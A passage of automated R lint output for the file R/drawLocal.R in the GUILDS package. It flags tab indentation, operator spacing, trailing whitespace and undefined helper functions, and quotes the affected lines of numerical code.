^~~~\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres <- rep(0, length(k1))\n^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx0 = which( x == 0 )\n^\n```\n[R/drawLocal.R:3:13:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tres <- rep(0, length(k1))\n           ~^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L4) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx0) > 0) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (cnt in 1:length(k1)) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n^~\n```\n[R/drawLocal.R:5:13:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (cnt in 1:length(k1)) {\n            ^\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tk <- k1[cnt]\n^~\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I)\n^~~\n```\n[R/drawLocal.R:7:19:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty[idx0] = aux\n^~\n```\n[R/drawLocal.R:8:16:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n               ^~~~~~~~~\n```\n[R/drawLocal.R:8:35:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n                                 ~^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txmax <- optimize(f, c(0,1))$minimum\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx1 = which(x == 1)\n^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txmax <- optimize(f, c(0,1))$minimum\n                    ~^~~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif (length(idx1) > 0) {\n^\n```\n[R/drawLocal.R:11:11:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n                    ~^~~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n^~\n```\n[R/drawLocal.R:12:9:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n        ^~~~~~~~~\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n                  ~^~~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tif(ymax < (y0 + 1)) {\n^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = -Inf\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin <- 0\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k == j) && (th == 1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      y[idx1] = 0\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tf <- function(x) {\n^~~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k == j) && (th < 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k) - ymax + 1)\n^~~~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = Inf\n^~~\n```\n[R/drawLocal.R:17:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k) - ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t}\n^~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  }\n^~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin <- uniroot(f, c(1e-10, xmax))$root\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:19:30:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\txmin <- uniroot(f, c(1e-10, xmax))$root\n                            ~^~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidxp = which((x > 0) & (x < 1))\n^\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n^~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\txx = x[idxp]\n^\n```\n[R/drawLocal.R:21:20:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n                   ^~~\n```\n[R/drawLocal.R:21:23:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n                      ^\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n^~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n^\n```\n[R/drawLocal.R:22:9:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n        ^~~~~~~~~\n```\n[R/drawLocal.R:22:20:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n                  ~^\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\twhile(ymax < (y1 + 1)) {\n^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tx1 <- (x1 + 1) / 2;\n^~~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I * xx + k) - lgamma(I * xx) +\n^~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n^~~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n^~\n```\n[R/drawLocal.R:25:10:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n         ^~~~~~~~~\n```\n[R/drawLocal.R:25:28:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n                          ~^\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  (th-1) * log(1 - xx) - log(xx)\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty[idxp] = aux\n^\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n                     ^~~\n```\n[R/drawLocal.R:31:39:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L31) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n                                      ^~~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:40:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:40:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L40) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L41) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                         ^\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                        ~^~\n```\n[R/drawLocal.R:41:60:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                                                          ~^~\n```\n[R/drawLocal.R:42:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L46) *style:* **Put spaces 